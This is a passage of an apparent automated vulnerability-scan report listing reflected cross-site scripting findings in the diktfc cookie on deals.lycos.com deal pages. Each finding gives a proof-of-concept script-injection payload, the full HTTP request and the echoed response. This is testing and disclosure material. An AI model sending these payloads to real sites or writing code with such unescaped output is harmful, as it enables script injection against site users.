<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee";alert(1)//c42f28c6d4b"
});
</script>
...[SNIP]...

3.224. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50667"><script>alert(1)</script>3e46c174419 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419&amp;cj=1" alt="tracker" />
...[SNIP]...

3.225. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8948a"%3balert(1)//0c42ac67901 was submitted in the diktfc cookie. This input was echoed as 8948a";alert(1)//0c42ac67901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a"%3balert(1)//0c42ac67901; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
cript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a";alert(1)//0c42ac67901"
});
</script>
...[SNIP]...

3.226. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d553c"><script>alert(1)</script>99f8fa73005 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ttp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005&amp;cj=1" alt="tracker" />
...[SNIP]...

3.227. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16e3"><script>alert(1)</script>e618ca21634 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634&amp;cj=1" alt="tracker" />
...[SNIP]...

3.228. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3d"%3balert(1)//178fd7981ee was submitted in the diktfc cookie. This input was echoed as 3da3d";alert(1)//178fd7981ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d"%3balert(1)//178fd7981ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d";alert(1)//178fd7981ee"
});
</script>
...[SNIP]...

3.229. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-32-720p-lcd-hdtv-for-330-414355

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea67"><script>alert(1)</script>5b7fd28b581 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581&amp;cj=1" alt="tracker" />
...[SNIP]...

3.230. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-32-720p-lcd-hdtv-for-330-414355

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e5a9"%3balert(1)//21691b5acad was submitted in the diktfc cookie. This input was echoed as 6e5a9";alert(1)//21691b5acad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9"%3balert(1)//21691b5acad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9";alert(1)//21691b5acad"
});
</script>
...[SNIP]...

3.231. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e5"><script>alert(1)</script>04a9fd962a5 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5&amp;cj=1" alt="tracker" />
...[SNIP]...

3.232. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14597"%3balert(1)//71a486517fb was submitted in the diktfc cookie. This input was echoed as 14597";alert(1)//71a486517fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597"%3balert(1)//71a486517fb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597";alert(1)//71a486517fb"
});
</script>
...[SNIP]...

3.233. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ce5"><script>alert(1)</script>570dcb9c64e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e&amp;cj=1" alt="tracker" />
...[SNIP]...

3.234. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46acf"%3balert(1)//6a7aece2843 was submitted in the diktfc cookie. This input was echoed as 46acf";alert(1)//6a7aece2843 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
